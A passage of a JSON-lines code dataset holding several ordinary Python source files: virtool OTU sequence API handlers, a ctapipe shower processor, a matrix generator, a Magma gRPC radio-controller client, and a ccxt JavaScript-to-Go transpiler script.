\"segment\"])\n\n if not document or not await db.sequences.count_documents({\"_id\": sequence_id}):\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n message = await virtool.otus.sequences.check_segment_or_target(\n db,\n otu_id,\n isolate_id,\n sequence_id,\n document[\"reference\"][\"id\"],\n data\n )\n\n if message:\n return bad_request(message)\n\n sequence_document = await asyncio.shield(virtool.otus.sequences.edit(\n req.app,\n otu_id,\n isolate_id,\n sequence_id,\n data,\n req[\"client\"].user_id\n ))\n\n return json_response(sequence_document)\n\n\n@routes.delete(\"/api/otus/{otu_id}/isolates/{isolate_id}/sequences/{sequence_id}\")\nasync def remove_sequence(req):\n \"\"\"\n Remove a sequence from an isolate.\n\n \"\"\"\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n isolate_id = req.match_info[\"isolate_id\"]\n sequence_id = req.match_info[\"sequence_id\"]\n\n if not await db.sequences.count_documents({\"_id\": sequence_id}):\n return not_found()\n\n document = await db.otus.find_one({\"_id\": otu_id, \"isolates.id\": isolate_id}, [\"reference\"])\n\n if document is None:\n return not_found()\n\n if not await virtool.references.db.check_right(req, document[\"reference\"][\"id\"], \"modify_otu\"):\n return insufficient_rights()\n\n await asyncio.shield(virtool.otus.sequences.remove(\n req.app,\n otu_id,\n isolate_id,\n sequence_id,\n req[\"client\"].user_id\n ))\n\n return no_content()\n\n\n@routes.get(\"/api/otus/{otu_id}/history\")\nasync def list_history(req):\n db = req.app[\"db\"]\n\n otu_id = req.match_info[\"otu_id\"]\n\n if not await db.otus.count_documents({\"_id\": otu_id}):\n return not_found()\n\n cursor = db.history.find({\"otu.id\": otu_id}, projection=virtool.history.db.LIST_PROJECTION)\n\n return json_response([d async for d in cursor])\n","sub_path":"virtool/otus/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":17155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570261449","text":"\"\"\"\nHigh level processing of showers.\n\nThis processor will be able to process a shower/event in 3 steps:\n- shower geometry\n- estimation of energy (optional, currently unavailable)\n- estimation of classification (optional, currently unavailable)\n\n\"\"\"\nfrom ctapipe.core import Component\nfrom ctapipe.core.traits import create_class_enum_trait\nfrom ctapipe.containers import ArrayEventContainer\nfrom ctapipe.instrument import SubarrayDescription\nfrom ctapipe.reco import Reconstructor\n\n\nclass ShowerProcessor(Component):\n \"\"\"\n Run the stereo event reconstruction on the input events.\n\n This is mainly needed, so that the type of reconstructor can be chosen\n via the configuration system.\n\n Input events must already contain dl1 parameters.\n \"\"\"\n reconstructor_type = create_class_enum_trait(\n Reconstructor, default_value=\"HillasReconstructor\",\n help=\"The stereo geometry reconstructor to be used\",\n )\n\n def __init__(\n self, subarray: SubarrayDescription, config=None, parent=None, **kwargs\n ):\n \"\"\"\n Parameters\n ----------\n subarray: SubarrayDescription\n Description of the subarray. Provides information about the\n camera which are useful in calibration. Also required for\n configuring the TelescopeParameter traitlets.\n config: traitlets.loader.Config\n Configuration specified by config file or cmdline arguments.\n Used to set traitlet values.\n This is mutually exclusive with passing a ``parent``.\n parent: ctapipe.core.Component or ctapipe.core.Tool\n Parent of this component in the configuration hierarchy,\n this is mutually exclusive with passing ``config``\n \"\"\"\n\n super().__init__(config=config, parent=parent, **kwargs)\n self.subarray = subarray\n self.reconstructor = Reconstructor.from_name(\n self.reconstructor_type,\n subarray=self.subarray,\n parent=self,\n )\n\n def __call__(self, event: ArrayEventContainer):\n \"\"\"\n Perform the full shower geometry reconstruction on the input event.\n\n Afterwards, optionally perform energy estimation and/or particle\n classification (currently these two operations are not yet supported).\n\n Parameters\n ----------\n event : ctapipe.containers.ArrayEventContainer\n Top-level container for all event information.\n \"\"\"\n k = self.reconstructor_type\n event.dl2.stereo.geometry[k] = self.reconstructor(event)\n","sub_path":"ctapipe/reco/shower_processor.py","file_name":"shower_processor.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651477429","text":"import random\nimport os\nimport sys\nfrom math import pow\n\nif len(sys.argv) == 1:\n print(\"Please specify the size of the matrix, exiting...\")\n sys.exit(1)\n\nn = int(sys.argv[1])\n\ntry:\n os.remove(\"data/a_\" + str(n))\n os.remove(\"data/b_\" + str(n))\nexcept FileNotFoundError:\n pass\nf_a = open(\"data/a_\" + str(n), \"a\")\nf_b = open(\"data/b_\" + str(n), \"a\")\n\nfor i in range(0, n):\n for j in range(0, n):\n f_a.write(str((random.randint(-30, 30))))\n if j != n - 1:\n f_a.write(\" \")\n f_b.write(str((random.randint(-30, 30))))\n if j != n - 1:\n f_b.write(\" \")\n f_a.write(\"\\n\")\n f_b.write(\"\\n\")","sub_path":"matrix_generator.py","file_name":"matrix_generator.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9791594","text":"\"\"\"\nCopyright 2021 The Magma Authors.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree.\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport argparse\nimport json\nimport logging\nimport sys\n\nimport grpc\nfrom dp.protos import enodebd_dp_pb2 as enodebd_msgs\nfrom dp.protos import enodebd_dp_pb2_grpc as enodebd_services\n\ndefault_cbsd_dict = {\n \"serial_number\": \"enodebd_client_serial_number\",\n \"fcc_id\": \"enodebd_client_fcc_id\",\n \"user_id\": \"enodebd_client_user_id\",\n \"min_power\": 0,\n \"max_power\": 20,\n \"antenna_gain\": 15,\n \"number_of_ports\": 2,\n}\n\nDP_RC_SERVICE_ADDR = 'localhost:50053'\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n)\n\n\ndef create_rc_service_channel(addr: str):\n \"\"\"\n Create Radio Controller service gRPC channel\n\n Parameters:\n addr: Radio Controller gRPC service URL\n\n Returns:\n gRPC channel\n \"\"\"\n channel = grpc.insecure_channel(addr)\n try:\n grpc.channel_ready_future(channel).result(timeout=10)\n except grpc.FutureTimeoutError:\n sys.exit('Error connecting to Radio Controller service')\n else:\n return channel\n\n\ndef create_grpc_dp_service(channel):\n \"\"\"\n Create Radio Controller gRPC service\n\n Parameters:\n channel: Radio Controller gRPC service channel\n\n Returns:\n DPServiceStub\n \"\"\"\n stub = enodebd_services.DPServiceStub(channel)\n return stub\n\n\ndef create_rc_grpc_cbsd_request(**kwargs):\n \"\"\"\n Construct a CBSDRequest gRPC message\n\n Parameters:\n kwargs: dict where keys are CBSDRequest fields, and values are the values\n\n Returns:\n CBSDRequest message\n \"\"\"\n msg = enodebd_msgs.CBSDRequest(**kwargs)\n return msg\n\n\ndef send_request(service, rpc, msg):\n \"\"\"\n Send a CBSDRequest gRPC message to gRPC endpoint\n\n Parameters:\n service: DBService\n rpc: the gRPC method of the service\n msg: CBSDRequest message\n\n Returns:\n CBSDStateResult\n \"\"\"\n resp = rpc(msg)\n return resp\n\n\ndef _get_cbsd_dict(json_file_path: str) -> dict:\n if not json_file_path:\n return default_cbsd_dict\n try:\n with open(json_file_path, 'r') as f:\n return json.load(f)\n except (ValueError, OSError) as err:\n logging.warning(\n f\"Failed to read or parse CBSD file {json_file_path}. {err}\",\n )\n raise\n\n\ndef _create_argparse(dp_service: enodebd_services.DPServiceStub):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-s', '--state', dest='rpc', action='store_const',\n default=dp_service.GetCBSDState, const=dp_service.GetCBSDState, help='CBSD Get State RPC',\n )\n parser.add_argument(\n '-r', '--register', dest='rpc', action='store_const',\n const=dp_service.CBSDRegister, help='CBSD Register RPC',\n )\n parser.add_argument(\n '-d', '--deregister', dest='rpc', action='store_const',\n const=dp_service.CBSDDeregister, help='CBSD Deregister RPC',\n )\n parser.add_argument(\n '-e', '--relinquish', dest='rpc', action='store_const',\n const=dp_service.CBSDRelinquish, help='CBSD Register RPC',\n )\n parser.add_argument(\n '-c', '--cbsd', dest='cbsd_json_file', action='store', type=str,\n default=None, help='Path to JSON file with CBSD config params',\n )\n return parser\n\n\ndef main():\n \"\"\"\n Top level function of the module\n \"\"\"\n channel = create_rc_service_channel(DP_RC_SERVICE_ADDR)\n dp_service = create_grpc_dp_service(channel)\n parser = _create_argparse(dp_service=dp_service)\n args = parser.parse_args()\n cbsd = _get_cbsd_dict(args.cbsd_json_file)\n msg = create_rc_grpc_cbsd_request(**cbsd)\n rpc_method_name = str(args.rpc._method)\n logging.info(f'Sending gRPC {rpc_method_name} request:\\n{msg}')\n resp = send_request(dp_service, args.rpc, msg)\n logging.info(f'Received gRPC response:\\n{resp}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dp/cloud/python/magma/radio_controller/enodebd_client.py","file_name":"enodebd_client.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"75588810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport traceback\nimport re\nimport humps\nimport subprocess\nimport shlex\n\nimport esprima\nimport json\n\n\nEX_NAME = 'Kucoin'\nCODE_INFO = {}\n\n\ndef get_ex_list():\n return [\n # 'kucoin',\n # 'huobipro',\n 'okex',\n # 'bitmax',\n # 'binance'\n ]\n\n\ndef get_func_code_map(code_str):\n return []\n\n\ndef init_code():\n return '''\npackage {ex}\n\nimport (\n\t. \"ccxt-master/go/base\"\n\t\"encoding/json\"\n\t\"errors\"\n\t\"fmt\"\n\t\"net/url\"\n\t\"strings\"\n)\n\ntype {ex.capitalize()} struct {\n\tExchange\n}\n\n '''\n\n\nJS_FOLD = 'js'\n\nEX_EXTRA_FUNC = {\n 'kucoin': ['fetchOrdersByStatus']\n}\nFUNC_LIST = [\n 'sign', 'fetchOrderBook', 'fetchOpenOrders', 'cancelOrder',\n 'createOrder', 'fetchOrder', 'parseOrder', 'fetchBalance',\n 'fetchOrdersByStatus', 'fetchOrdersByState', 'fetchMarkets',\n 'fetchCurrencies', 'handleErrors', 'fetchAccounts',\n 'parseOrderStatus', 'fetchOrdersByStates',\n 'ParseOrderSide', 'parseMarkets', 'parseMarket',\n 'fetchMarketsByType', 'getPathAuthenticationType', 'parseOrderSide',\n 'parseBalanceByType', 'parseAccountBalance', 'parseMarginBalance', 'parseFuturesBalance', 'parseSwapBalance'\n]\nJS_PATCH_FOR_GOLAGNG_TRANSLATE = {\n 'kucoin': {\n 'sign': {\n \"let amount = this.safeFloat (order, 'size');\": \"amount = xdfsa\",\n }\n }\n}\n\ndef read_describe(str_code):\n x = re.findall(r\"super.describe \\(\\), ({.*?})\\);\", str_code, re.MULTILINE|re.DOTALL)[0]\n\n xx = ''\n for line in x.split('\\n'):\n if '// ' in line:\n line = line[:line.find('//')]\n if 'this.' in line:\n continue\n xx += line + '\\n'\n\n x = xx\n x = re.sub(r': ([A-Z].+),', r': \"\\1\",', x)\n x = x.replace('undefined', 'None')\n x = x.replace('true', 'True')\n x = x.replace('false', 'False')\n a = eval(x)\n return a\n\n\ndef format_js_code_for_espima_analysis(func, block):\n block = block.replace('await ', '')\n block = block.replace('async ', 'function ')\n if 'function' not in block.split('\\n')[0]:\n block = 'function' + block\n return block\n\n\ndef format_describe_func(desc):\n return f'''\n func (self *{EX_NAME}) Describe() []byte {{\n\treturn []byte(`{json.dumps(desc, indent=4)}`)\n\t}}\n\t'''\n\ndef split_func_list(str_code):\n res = str_code.split('\\n\\n')\n if res:\n tmp = res[-1]\n res[-1] = tmp.replace('};', '')\n return res\n\n\ndef read_func(str_code):\n result = {}\n\n for block in split_func_list(str_code):\n for func in FUNC_LIST:\n if f'{func} ' in block.split('\\n')[0]:\n result[func] = format_js_code_for_espima_analysis(func, block)\n # print(format_js_code_for_espima_analysis(func, block))\n\n return result\n\n\ndef read_code_str(ex):\n p = os.path.join('..', 'js', f'{ex}.js')\n with open(p, encoding='UTF-8') as f:\n str_code = f.read()\n\n return {\n 'describe': read_describe(str_code),\n 'func': read_func(str_code),\n }\n\n\nFUNC_ARG_MAP = {\n 'createOrder': 'symbol string, typ string, side string, amount float64, price float64, params map[string]interface{}',\n 'fetchBalance': 'params map[string]interface{}',\n 'cancelOrder': 'id string, symbol string, params map[string]interface{}',\n 'fetchOpenOrders': 'symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrdersByStatus': 'status string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrdersByState': 'status string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrdersByStates': 'states string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchOrderBook': 'symbol string, limit int64, params map[string]interface{}',\n 'fetchOrder': 'id string, symbol string, params map[string]interface{}',\n 'sign': 'path string, api string, method string, params map[string]interface{}, headers interface{}, body interface{}',\n 'parseOrder': 'order interface{}, market interface{}',\n 'parseOrders': 'status string, symbol string, since int64, limit int64, params map[string]interface{}',\n 'fetchMarkets': 'params map[string]interface{}',\n 'fetchCurrencies': 'params map[string]interface{}',\n 'handleErrors': 'httpCode int64, reason string, url string, method string, headers interface{}, body string, response interface{}, requestHeaders interface{}, requestBody interface{}',\n 'fetchAccounts': 'params map[string]interface{}',\n 'parseOrderStatus': 'status string',\n 'ParseOrderSide': 'side string',\n 'parseMarket': 'market interface{}',\n 'parseMarkets': 'markets []interface{}',\n 'fetchMarketsByType': 'typ string, params map[string]interface{}',\n 'getPathAuthenticationType': 'path string',\n 'parseOrderSide': 'side string',\n 'parseBalanceByType': 'typ string, response interface{}',\n 'parseAccountBalance': 'response interface{}',\n 'parseMarginBalance': 'response interface{}',\n 'parseFuturesBalance': 'response interface{}',\n 'parseSwapBalance': 'response interface{}',\n}\nRETURN_MAP = {\n 'createOrder': 'result *Order, err error',\n 'fetchBalance': 'balanceResult *Account, err error',\n 'cancelOrder': 'response interface{}, err error',\n 'fetchOrdersByStatus': 'orders interface{}',\n 'fetchOrdersByState': 'orders interface{}',\n 'fetchOrdersByStates': 'orders interface{}',\n 'fetchOpenOrders': 'result []*Order, err error',\n 'fetchOrderBook': 'orderBook *OrderBook, err error',\n 'fetchOrder': 'result *Order, err error',\n 'sign': 'ret interface{}',\n 'parseOrder': 'result map[string]interface{}',\n 'fetchMarkets': '[] interface{}',\n 'fetchCurrencies': 'map[string]interface{}',\n 'handleErrors': '',\n 'fetchAccounts': '[]interface{}',\n 'parseOrderStatus': 'string',\n 'ParseOrderSide': 'string',\n 'parseMarket': 'interface{}',\n 'parseMarkets': '[] interface{}',\n 'fetchMarketsByType': '[] interface{}',\n 'getPathAuthenticationType': 'string',\n 'parseOrderSide': 'string',\n 'parseBalanceByType': 'interface{}',\n 'parseAccountBalance': 'map[string]interface{}',\n 'parseMarginBalance': 'map[string]interface{}',\n 'parseFuturesBalance': 'map[string]interface{}',\n 'parseSwapBalance': 'map[string]interface{}',\n}\nPANIC_DEAL_FUNC = [o.lower() for o in [\n 'fetchOrderBook', 'fetchOpenOrders', 'cancelOrder',\n 'createOrder', 'fetchOrder', 'fetchBalance',\n]]\nNIL_MAP = {\n 'string': '\"\"',\n 'int64': '0',\n 'error': 'nil'\n}\nERROR_RETURN_FUNCS = [o.lower() for o in []]\nSIDE = None\n\n\ndef get_return(func_name):\n return RETURN_MAP.get(func_name, None)\n\n\ndef get_arg(func_name):\n default = '(interface{})'\n return FUNC_ARG_MAP.get(func_name, default)\n\n\nDEFAULT_FUNC_ARGS = {\n 'SafeStringLower'.lower(): (3, '\"\"'),\n 'SafeString2'.lower(): (4, '\"\"'),\n 'SafeInteger2'.lower(): (4, 0),\n 'SafeFloat2'.lower(): (4, 0.),\n 'SafeValue'.lower(): (3, 'nil'),\n 'SafeString'.lower(): (3, '\"\"'),\n 'ApiFunc'.lower(): (4, 'nil'),\n 'SafeFloat'.lower(): (3, 0),\n 'SafeInteger'.lower(): (3, 0),\n}\n\n\ndef ThisExpression(syntax, info={}):\n return 'self'\n\n\ndef MemberExpression(syntax, info={}):\n info['error_check'] = False\n method_name = call_func_by_syntax(syntax.property)\n if syntax.object.type == 'ThisExpression' and syntax.property.type == 'Identifier' and method_need_check_err(method_name):\n info['error_check'] = True\n\n if syntax.object.type == 'ThisExpression':\n method_name = humps.pascalize(method_name)\n\n obj = call_func_by_syntax(syntax.object)\n if syntax.object.type == 'ThisExpression':\n return f'{obj}.{method_name}'\n else:\n m = {\n 'toString': f'fmt.Sprintf(\"%v\", {obj})',\n 'length': f'self.Length({obj})',\n }\n default = f'{obj}[{method_name}]'\n\n if syntax.property.type == 'Identifier' and syntax.property.name == 'push':\n if 'arg_str' in info:\n return f'{obj} = append({obj}, {info[\"arg_str\"]})'\n if syntax.property.type == 'Identifier' and syntax.property.name == 'split':\n if 'arg_str' in info:\n return f'strings.Split({obj}, {info[\"arg_str\"]})'\n\n # if info.get('pre') in ['right', 'init', 'test']:\n if info.get('pre') != 'left':\n default = f'self.Member({obj}, {method_name})'\n if info.get('pre') in ['left']:\n default = f'self.SetValue({obj}, {method_name})'\n\n return m.get(syntax.property.name, default)\n\n\ndef CallExpression(syntax, info={}):\n arg_str = ','.join([call_func_by_syntax(arg, info) for arg in syntax.arguments])\n\n # default arg\n if syntax.callee.property and syntax.callee.property.name.lower() in DEFAULT_FUNC_ARGS:\n arg_info = DEFAULT_FUNC_ARGS[syntax.callee.property.name.lower()]\n arg_str += f', {arg_info[1]}' * (arg_info[0] - len(syntax.arguments))\n info.update({'arg_str': arg_str})\n\n pre_part = f'{call_func_by_syntax(syntax.callee, info)}'\n\n if syntax.callee.type == 'MemberExpression' and syntax.callee.object.type == 'Identifier' and syntax.callee.object.name == 'Object':\n if syntax.callee.property.name == 'keys':\n return f'reflect.ValueOf({call_func_by_syntax(syntax.arguments[0])}).MapKeys()'\n\n # toString -> fmt.Sprintf\n if '(' in pre_part and ')' in pre_part:\n return pre_part\n\n call_str = pre_part\n api_func_keys = [capital_first(o) for o in CODE_INFO['describe']['api'].keys()]\n api_func_pattern = f\"self\\.({'|'.join(api_func_keys)})\"\n if re.findall(api_func_pattern, call_str):\n info1 = DEFAULT_FUNC_ARGS['apifunc']\n arg_str += f', {info1[1]}' * (info1[0] - len(syntax.arguments) - 1)\n return f'self.ApiFunc(\"{syntax.callee.property.name}\", {arg_str})'\n # xx.split('_') -> string.Split(xx, '_')\n elif not call_str.endswith(')'):\n return f'{call_str}({arg_str})'\n else:\n return call_str\n\n\ndef ExpressionStatement(syntax, info={}):\n info['error_check'] = False\n s = call_func_by_syntax(syntax.expression, info)\n\n if info.get('error_check'):\n return f'_, err = {s}\\n if err != nil {{\\n return \\n}}'\n else:\n return s\n\n\ndef method_need_check_err(name, info={}):\n if any(name.lower().startswith(o) for o in ERROR_RETURN_FUNCS):\n return True\n return False\n\n\ndef VariableDeclarator(syntax, info={}):\n left = call_func_by_syntax(syntax.id)\n operator = ':='\n if left in ARG_TYPE or left in RET_TYPE:\n operator = '='\n\n info = {'pre': 'init'}\n if syntax.init.type == 'Identifier' and syntax.init.name == 'undefined':\n return f'var {left} interface{{}}'\n if syntax.id.type == 'ArrayPattern':\n return f'{left} {operator} self.Unpack{len(syntax.id.elements)}({call_func_by_syntax(syntax.init)})'\n\n right = call_func_by_syntax(syntax.init, info)\n\n if info.get('error_check'):\n return f'{left}, err {operator} {right}\\nif err != nil {{\\nreturn nil, err\\n}}'\n else:\n return f'{left} {operator} {right}'\n\n\ndef VariableDeclaration(syntax, info={}):\n return '\\n'.join([call_func_by_syntax(o) for o in syntax.declarations])\n\n\ndef ObjectExpression(syntax, info={}):\n k_v = ''\n for one in syntax.properties:\n k_v += f'\\n{call_func_by_syntax(one.key)}: {call_func_by_syntax(one.value)},'\n ret = f'map[string]interface{{}}{{{k_v}\\n}}'\n return ret\n\n\ndef Literal(syntax, info={}):\n if \"'\" in syntax.raw:\n val = syntax.raw.replace('\"', '')\n val = val.replace(\"'\", '')\n val = f'\"{val}\"'\n else:\n val = f'{syntax.value}'\n return val\n\n\ndef Identifier(syntax, info={}):\n m = {\n 'undefined': 'nil',\n 'type': 'typ',\n }\n return m.get(syntax.name, syntax.name)\n\n\ndef BinaryExpression(syntax, info={}):\n operator = syntax.operator\n\n if syntax.right.name == 'undefined':\n if operator == '===':\n return f'self.TestNil({call_func_by_syntax(syntax.left)})'\n if operator == '!==':\n return f'!self.TestNil({call_func_by_syntax(syntax.left)})'\n\n if operator == '===':\n operator = '=='\n if operator == '!==':\n operator = '!='\n if operator == 'in':\n # return f'_, ok := {call_func_by_syntax(syntax.right)}[{call_func_by_syntax(syntax.left)}]; ok'\n return f'self.InMap({call_func_by_syntax(syntax.left)}, {call_func_by_syntax(syntax.right)})'\n left = call_func_by_syntax(syntax.left)\n right = call_func_by_syntax(syntax.right)\n\n if left in ARG_TYPE and right == 'nil':\n right = NIL_MAP.get(ARG_TYPE[left], 'nil')\n\n return f'{left} {operator} {right}'\n\n\ndef call_func_by_syntax(syntax, info={}):\n try:\n return globals()[syntax.type](syntax, info)\n except Exception as e:\n print(traceback.format_exc())\n print(syntax)\n raise\n\n\ndef AssignmentExpression(syntax, info={}):\n operator = syntax.operator\n if syntax.left.type == 'MemberExpression':\n arg1 = call_func_by_syntax(syntax.left.object)\n arg2 = call_func_by_syntax(syntax.left.property)\n arg3 = call_func_by_syntax(syntax.right, {\"pre\": \"right\"})\n return f'self.SetValue({arg1}, {arg2}, {arg3})'\n else:\n left = call_func_by_syntax(syntax.left, {\"pre\": \"left\"})\n right = call_func_by_syntax(syntax.right, {\"pre\": \"right\"})\n return f'{left} {operator} {right}'\n\n\ndef BlockStatement(syntax, info={}):\n lines = '\\n'.join([call_func_by_syntax(block) for block in syntax.body])\n return f'{{\\n{lines}}}'\n\n\ndef IfStatement(syntax, info={}):\n ret = f'if {call_func_by_syntax(syntax.test)} '\n\n ret = f'if self.ToBool({call_func_by_syntax(syntax.test)}) '\n ret += f'{call_func_by_syntax(syntax.consequent)}'\n\n if syntax.alternate:\n ret += (\n f' else '\n f'{call_func_by_syntax(syntax.alternate)}'\n )\n\n return ret\n\n\ndef ConditionalExpression(syntax, info={}):\n return f'self.IfThenElse(self.ToBool({call_func_by_syntax(syntax.test, {\"pre\": \"test\"})}), {call_func_by_syntax(syntax.consequent)}, {call_func_by_syntax(syntax.alternate)})'\n\n\ndef ArrayPattern(syntax, info={}):\n return ', '.join([call_func_by_syntax(e) for e in syntax.elements])\n\n\ndef UnaryExpression(syntax, info={}):\n return f'{syntax.operator}self.ToBool({call_func_by_syntax(syntax.argument)})'\n\n\ndef ReturnStatement(syntax, info={}):\n if not syntax.argument:\n return f'return'\n\n if info.get('return') and ',' in info['return']:\n return f'return {call_func_by_syntax(syntax.argument)}, nil'\n else:\n return f'return {call_func_by_syntax(syntax.argument)}'\n\n\ndef UpdateExpression(syntax, info={}):\n return f'{call_func_by_syntax(syntax.argument)}{syntax.operator}'\n\n\ndef ForStatement(syntax, info={}):\n return f'for {call_func_by_syntax(syntax.init)}; {call_func_by_syntax(syntax.test)}; {call_func_by_syntax(syntax.update)} {call_func_by_syntax(syntax.body)}'\n\n\ndef ThrowStatement(syntax, info={}):\n return f'self.RaiseException(\"{syntax.argument.callee.name}\", {call_func_by_syntax(syntax.argument.arguments[0])})'\n\n\ndef LogicalExpression(syntax, info={}):\n return f'{call_func_by_syntax(syntax.left)} {syntax.operator} {call_func_by_syntax(syntax.right)}'\n\n\ndef ArrayExpression(syntax, info={}):\n elements = ','.join([call_func_by_syntax(o) for o in syntax.elements])\n return f'[]interface{{}}{{{elements}}}'\n\n\ndef capital_first(s, info={}):\n return s[0].upper() + s[1:]\n\n\nFUNC_LINES = 99\nARG_TYPE = dict()\nRET_TYPE = dict()\ndef FunctionDeclaration(syntax, info={}):\n result_code = []\n func_name = syntax.id.name\n\n global ARG_TYPE, RET_TYPE\n\n func_arg_str = get_arg(func_name)\n a = [tuple(pair.split(' ')) for pair in func_arg_str.split(', ')]\n try:\n ARG_TYPE = dict(a)\n except Exception as e:\n print(str(e))\n print(a)\n func_ret_str = get_return(func_name)\n a = [tuple(pair.split(' ')) for pair in func_ret_str.split(', ')]\n try:\n RET_TYPE = dict(a)\n except:\n RET_TYPE = {}\n\n if syntax.body.type == 'BlockStatement':\n for idx, block in enumerate(syntax.body.body):\n result_code.append(call_func_by_syntax(block, {'return': func_ret_str}))\n if idx == FUNC_LINES:\n break\n\n str_result_code = '\\n'.join(result_code)\n\n panic_deal = ''\n if func_name.lower() in PANIC_DEAL_FUNC:\n panic_deal = '''defer func() {\n\t\tif e := recover(); e != nil {\n\t\t\terr = self.PanicToError(e)\n\t\t}\n\t}()\n '''\n\n return f'''func (self *{EX_NAME}) {capital_first(func_name)} ({func_arg_str}) ({func_ret_str}) {{\n {panic_deal}{str_result_code}\n}}\n '''\n\n\ndef syntax_analysis(syntax, info={}):\n ret = ''\n for idx, func in enumerate(syntax):\n ret += call_func_by_syntax(func)\n return ret\n\ndef parse_by_syntax(str_code):\n str_code = str_code.replace('await ', '')\n str_code = str_code.replace('async ', 'function ')\n syntax = esprima.parse(str_code)\n return syntax_analysis(syntax.body)\n\n\ndef format_header():\n return f'''\n package {EX_NAME.lower()}\n\nimport (\n\t\"fmt\"\n\t. \"github.com/georgexdz/ccxt/go/base\"\n\t\"reflect\"\n\t\"strings\"\n)\n\ntype {EX_NAME} struct {{\n\tExchange\n}}\n\nfunc New(config *ExchangeConfig) (ex *{EX_NAME}, err error) {{\n\tex = new({EX_NAME})\n\terr = ex.Init(config)\n\tex.Child = ex\n\n\terr = ex.InitDescribe()\n\tif err != nil {{\n\t\tex = nil\n\t\treturn\n\t}}\n\n\treturn\n}}\n\n'''\n\n\ndef format_funcs(func_info_map):\n ret = ''\n\n for func, code in func_info_map.items():\n try:\n ret += parse_by_syntax(code) + '\\n'\n # print(format_describe_func(info['describe']))\n except Exception as e:\n print(code)\n print(traceback.format_exc())\n\n return ret\n\n\ndef format_ex_code(ex):\n global CODE_INFO\n info = read_code_str(ex)\n CODE_INFO = info\n\n return f'''\n {format_header()}\n {format_describe_func(info['describe'])}\n {format_funcs(info['func'])}\n '''\n\n\ndef format_test_file(ex):\n return f'''\npackage {EX_NAME.lower()}\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"testing\"\n)\n\nfunc get_test_config(ex *{EX_NAME.capitalize()}) {{\n\tplan, err := ioutil.ReadFile(\"test_config.json\")\n\tif err != nil {{\n\t\treturn\n\t}}\n\n\tvar data interface{{}}\n\terr = json.Unmarshal(plan, &data)\n\tif err != nil {{\n\t\treturn\n\t}}\n\t\n\tfmt.Println(data)\n\n\tif json_config, ok := data.(map[string]interface{{}}); ok {{\n ex.Urls = map[string]interface{{}}{{\n \t\"api\": map[string]interface{{}}{{\n \t\t\"public\": json_config[\"url\"],\n \t\t\"private\": json_config[\"url\"],\n\t\t\t}},\n }}\n\t\tex.ApiUrls[\"private\"] = json_config[\"url\"].(string)\n\t\tex.ApiUrls[\"public\"] = json_config[\"url\"].(string)\n\t\tex.ApiKey = json_config[\"key\"].(string)\n\t\tex.Secret = json_config[\"secret\"].(string)\n\t\tex.Password = json_config[\"password\"].(string)\n\t}}\n}}\n\nfunc TestFetchOrderBook(t *testing.T) {{\n\tex, _ := New(nil)\n\tfmt.Println(ex.ApiDecodeInfo)\n\tex.Verbose = true\n\n\tget_test_config(ex)\n\n\tmarkets, err := ex.LoadMarkets()\n\tif err != nil {{\n\t\tt.Fatal(err)\n\t\treturn\n\t}}\n\tfmt.Println(\"markets:\", markets)\n\n\torderbook, err := ex.FetchOrderBook(\"BTC/USDT\", 20, nil)\n\tif err != nil {{\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}}\n\tfmt.Println(\"orderbook:\", orderbook)\n\n\tex.FetchBalance(nil)\n\n\torder, err := ex.CreateOrder(\"ETH/BTC\", \"limit\", \"buy\", 0.0001, 0.024, nil)\n\tif err != nil {{\n\t\treturn\n\t}}\n\n\tfmt.Println(ex.FetchOrder(order[\"id\"].(string), \"ETH/BTC\", nil))\n\n\topenOrders, err := ex.FetchOpenOrders(\"ETH/BTC\", 0, 20, nil)\n\tif err == nil {{\n\t\tfmt.Println(\"openorders\", openOrders)\n\t}}\n\n\tif err == nil {{\n\t\tres, err := ex.CancelOrder(order[\"id\"].(string), \"ETH/BTC\", nil)\n\t\tfmt.Println(res, err)\n\t}}\n}}\n\n//func main() {{\n\t//ex := &ccxt.Kucoin{{}}\n\t//ex.Init()\n\t//// testFetchMarkets(ex)\n\t//fmt.Println(\"enter\")\n\t//testFetchOrderBook(ex)\n//}}'''\n\ndef write_ex_file(ex, code):\n des_dir = os.path.join('..', 'go', 'generated', f'{ex.lower()}')\n if not os.path.exists(des_dir):\n os.makedirs(des_dir)\n with open(os.path.join(des_dir, f'{ex.lower()}.go'), 'w') as f:\n f.write(code)\n with open(os.path.join(des_dir, f'{ex.lower()}_test.go'), 'w') as f:\n f.write(format_test_file(ex))\n # go fmt\n # cmd = \"go fmt -x %s\" % shlex.quote(des_dir)\n cmd = 'GO111MODULE=on go fmt -x %s' % shlex.quote(des_dir)\n p = subprocess.Popen(cmd, shell=True)\n p.communicate()\n\n\ndef translate():\n global EX_NAME\n for ex in get_ex_list():\n EX_NAME = ex.capitalize()\n code = format_ex_code(ex)\n write_ex_file(ex, 